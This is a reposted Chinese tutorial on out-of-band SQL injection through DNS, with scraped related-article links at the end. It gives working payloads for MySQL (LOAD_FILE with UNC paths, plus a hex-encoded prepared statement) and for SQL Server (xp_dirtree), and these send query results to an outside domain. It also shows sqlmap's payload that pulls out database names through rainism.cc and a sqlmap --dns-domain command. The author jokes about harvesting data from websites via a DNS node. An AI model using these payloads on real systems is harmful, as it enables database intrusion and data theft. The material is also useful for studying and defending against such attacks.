sqlmap利用DNS进行oob(out of band)注入(转)
0x00 起因
实际案子的时候遇到了一个注入,过狗可以使用sqlmap
,但是是基于时间的注入和限制频率需要使用--delay
参数,本来就是延时再加上--delay
等的心力憔悴。所有有了下面介绍使用sqlmap
利用DNS
进行oob(out of band)
注入,快速出数据。一般情况下仅适用于windows
平台
0x01 场景
你有没有遇到这样类似的注入场景。
1、时间盲注,数据库、表及字段内容特别多,等到花儿也谢了。
2、mysql5.6+
只能使用mysqli
或pdo
连接方式,多推荐使用pdo连接。使用pdo
连接方式,可以执行多语句,但是PDO
只会返回第一条SQL语句的执行结果,所以一般不能直接拿到数据,被迫通过update
某个可见字段或者sleep
注入
3、遇到waf
拦截,含有特定内容的返回包接受不到,明明测试没有拦截过滤,感觉执行成功了,却没有接收到返回数据(能执行命令的时候也可以向web
目录写文件)
0x02 原理
使用unc
路径,会对指定的域名进行dns
查询,使用dns
信道,配合dns
服务器收到的数据可快速得到数据内容。
使用dns
有一定的好处,可以突破主机网络隔离,例如dmz主机不能直接连外网,但是配置的网络可达的dns服务器
往往可以,通过查询域名递归的方式,dns服务器
可以将返回数据通过dns协议带出去。unc
路径是windows
下的特性,默认安装的linux下不存在这样的功能。
流程图如下:
mysql
使用pdo链接数据库盲注判断是否成功的测试语句(普通的注入也可以参考)
SELECT LOAD_FILE(CONCAT('//',(SELECT 2333),'.mysql.panokaz.exeye.io/abc'));
select hex("SELECT LOAD_FILE(CONCAT('//',(SELECT 2333),'.mysql.panokaz.exeye.io/abc'));")
set @x=0x53454C454354204C4F41445F46494C4528434F4E43415428272F2F272C2853454C45435420277465737427292C272E6D7973716C2E70616E6F6B617A2E65786579652E696F2F6162632729293B;prepare a from @x;execute a;
mysql的使用场景:
之前抓到国内dns递归的上层dns服务器有360、tencent、ali的,如果我有一个这样的节点dns服务器,肯定可以收获很多羞羞的网站,想想还有点小激动呢≥▽≤sqlserver
可以使用以下方式
declare @s varchar(5000),@host varchar(5000) set @s=(host_name()) set @host=CONVERT(varchar(5000),@s)+'sqlserver.panokaz.exeye.io';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"')
sqlserver的使用场景:
0x03 手工测试遇到的问题及解决方案
- 因为存在
dns缓存
,请求过一次域名后,会在本机产生dns记录,不会向外递归查询,所以unc路径
中DNS域名不能相同 unc路径
长度不能过长,通过sqlserver
报错显示以 '\\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' 开头的 标识符 太长。最大长度为 128。
可知unc路径
最大长度为128unc路径
中不能含有空格等特殊字符,包含的话不会发送dns请求
以sqlserver
的注入为例,参考sqlmap
给出的方案解决
'; DECLARE @host varchar(1024);
SELECT @host='rMy.'+(SELECT TOP 1 master.dbo.fn_varbintohexstr(CAST(SUBSTRING((ISNULL(CAST(name AS NVARCHAR(4000)),' ')),1,13) AS VARBINARY(8000))) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 4 name FROM master..sysdatabases ORDER BY name) ORDER BY name)+'.Nrz.rainism.cc';
EXEC('master..xp_dirtree "\\'+@host+'\cCkc"')--
- 通过在域名中添加随机字符串
'rMy'
,'Nrz'
确保每次查询dns不存在缓存 - 通过使用
substring()
函数每次传输特定位数的数据 - 通过使用
master.dbo.fn_varbintohexstr()
存储过程对获得数据进行16禁止编码
0x04 使用sqlmap的dns-domain参数进行oob注入
这么方便快捷的注入方式怎么会没有自动化的工具,仔细看过sqlmap
文档的同学肯定知道--dns-domain
的参数,这就是sqlmap
集成的利用dns
进行oob注入
的方法
使用方法:sqlmap
使用--dns-domain
参数时候会监听53端口,我们需要把我们获得数据所使用的域名的dns服务器
配置到我们运行sqlmap的主机,就可以获得dns外带的数据。
因为配置dns服务器的时候也需要dns,所以我们需要两个域名,详细配置如下:
配置我们的用于解析dns的nameserver的域名ns1.xxx.com
,ns2.xxx.com
指向我们运行sqlmap的主机ip,这里我使用*通配符配置A记录
配置我们用于外带数据的域名rainism.cc的域名服务器为ns1.xxx.com
和ns2.xxx.com
我们在外网的vps上执行如下命令sqlmap.py -u 'http://xxoo.com/index.php?id=1*' --random-agent --dns-domain='rainism.cc' -v 3
可以看到sqlmap执行的语句和返回的数据
使用tcpdump监听53端口,可以看到回传的数据内容
sqlmap利用DNS进行oob(out of band)注入(转)的更多相关文章
- 利用DNS实现SQL注入带外查询(OOB)
根据用于数据检索的传输信道,SQLi可分为三个独立的类别:inference(经典SQL注入),inband(盲注.推理注入.带内注入)和out-of-band 一.什么是OOB out-of-ban ...
- 利用DNS Zone Transfers漏洞工具dnswalk
利用DNS Zone Transfers漏洞工具dnswalk DNS Zone Transfers(DNS区域传输)是指一台备用服务器使用来自主服务器的数据刷新自己的域(zone)数据库.当主服 ...
- 利用dns解析来实现网站的负载均衡
当网站的访问量大了就会考虑负载均衡,这也是每一个架构师的基本功了,其基本地位就相当于相声里的说学逗唱,活好不好就看这个了 :) 传统的负载均衡思路是单点的,不管你是硬件的还是软件的基本都是这样的原理 ...
- 利用DNS AAAA记录和IPv6地址传输后门
0x00 前言 在本文中,我想解释如何在DNS流量中利用IPv6地址(AAAA)记录传输Payload.在我之前的文章中,我解释了如何利用DNS和PTR记录,现在我们将讨论AAAA记录. 本文分为两部 ...
- iodine免费上网——本质就是利用dns tunnel建立tcp,然后tcp proxy来实现通过访问虚拟dns0网卡来访问你的dns 授权server
我的命令: server端: sudo iodined -P passwd -f -DD 10.0.0.100 abc.com client端(直连模式,-r表示使用xxx.abc.com的xxx来转 ...
- DNS反射放大攻击分析——DNS反射放大攻击主要是利用DNS回复包比请求包大的特点,放大流量,伪造请求包的源IP地址为受害者IP,将应答包的流量引入受害的服务器
DNS反射放大攻击分析 摘自:http://www.shaojike.com/2016/08/19/DNS%E6%94%BE%E5%A4%A7%E6%94%BB%E5%87%BB%E7%AE%80%E ...
- 技术报告:APT组织Wekby利用DNS请求作为C&C设施,攻击美国秘密机构
技术报告:APT组织Wekby利用DNS请求作为C&C设施,攻击美国秘密机构 最近几周Paloalto Networks的研究人员注意到,APT组织Wekby对美国的部分秘密机构展开了一次攻击 ...
- 利用DNS进行命令控制和搭建隧道
目录 利用DNS进行命令控制(DNS-Shell) 利用DNS搭建隧道 利用DNS进行命令控制(DNS-Shell) DNS-Shell是一款通过DNS信道实现交互式Shell的强大工具,该工具的服务 ...
- 黑客是如何利用DNS域传送漏洞进行渗透与攻击的?
一.DNS域传送 DNS :Domain Name System 一个保存IP地址和域名相互映射关系的分布式数据库,重要的互联网基础设施,默认使用的TCP/UDP端口号是53 常见DNS记录类型: 1 ...
随机推荐
- 解决Ubuntu“下载额外数据文件失败 ttf-mscorefonts-installer”的问题 (转载)
解决Ubuntu“下载额外数据文件失败 ttf-mscorefonts-installer”的问题 发表于 2017-09-15 | 更新于 2018-04-29 | 分类于 Linux | 评论数: ...
- Python 3 利用 Dlib 19.7 进行人脸检测
0. 引言 / Overview 介绍 Dlib 中基于 HOG,Histogram of Oriented Gradients / 方向梯度直方图 实现 Face Detect / 人脸检测 的两个 ...
- 使用yum安装文件时提示安装文件重复问题2:nodejs-10.15.3-1nodesource.x86_64: [Errno 256] No more mirrors to try.
原因:yum命令缓存问题 解决办法: sudo yum clean all
- java之接口开发-初级篇
简述:转眼之间已经开发java有五年之余了,从以前的刚刚接触电脑,到现在的公司上班,真是转眼之间呀!前两年开发过前端,后台和Android,Android火的那几年,差点转去做Android,哈哈!后 ...
- Swagger本地环境配置
一.技术背景 随着互联网技术的发展,现在的网站架构基本都由原来的后端渲染,变成了:前端渲染.先后端分离的形态,而且前端技术和后端技术在各自的道路上越走越远.而前后端的唯一联系便是 API 接口,与此同 ...
- spring-session实现分布式集群session的共享(转)
原文: https://www.cnblogs.com/youzhibing/p/7348337.html HttpSession是通过Servlet容器创建和管理的,像Tomcat/Jetty都是保 ...
- iOS静默推送(Silent Remote Notifications)
此功能是iOS7新增加的功能,允许应用收到通知后在后台(background)状态下运行一段代码,可用于从服务器获取内容更新. 普通推送:收到推送后(有文字有声音),点开通知,进入APP后,才执行-- ...
- 常用DB2命令
建库 db2 territory CN on 建库到指定位置 db2 create database OADB on D: using codeset GBK territory CN 列出所有数据库 ...
- java判断字符串编码
是 public static String getEncoding(String str){ String encoding = "UTF-8"; try { if (str.e ...
- No.111_第四次团队会议
后端的偏执 啊,这次又轮到我写团队博客了. 此时又是深夜,窗外漫天繁星.舍友的呼噜声惊吓了月亮,它害羞地跑回了云里去. 我关上灯拔掉机械,悄悄拿着电脑上了床,写这次的团队博客.曾经觉得自己绝对不会晚睡 ...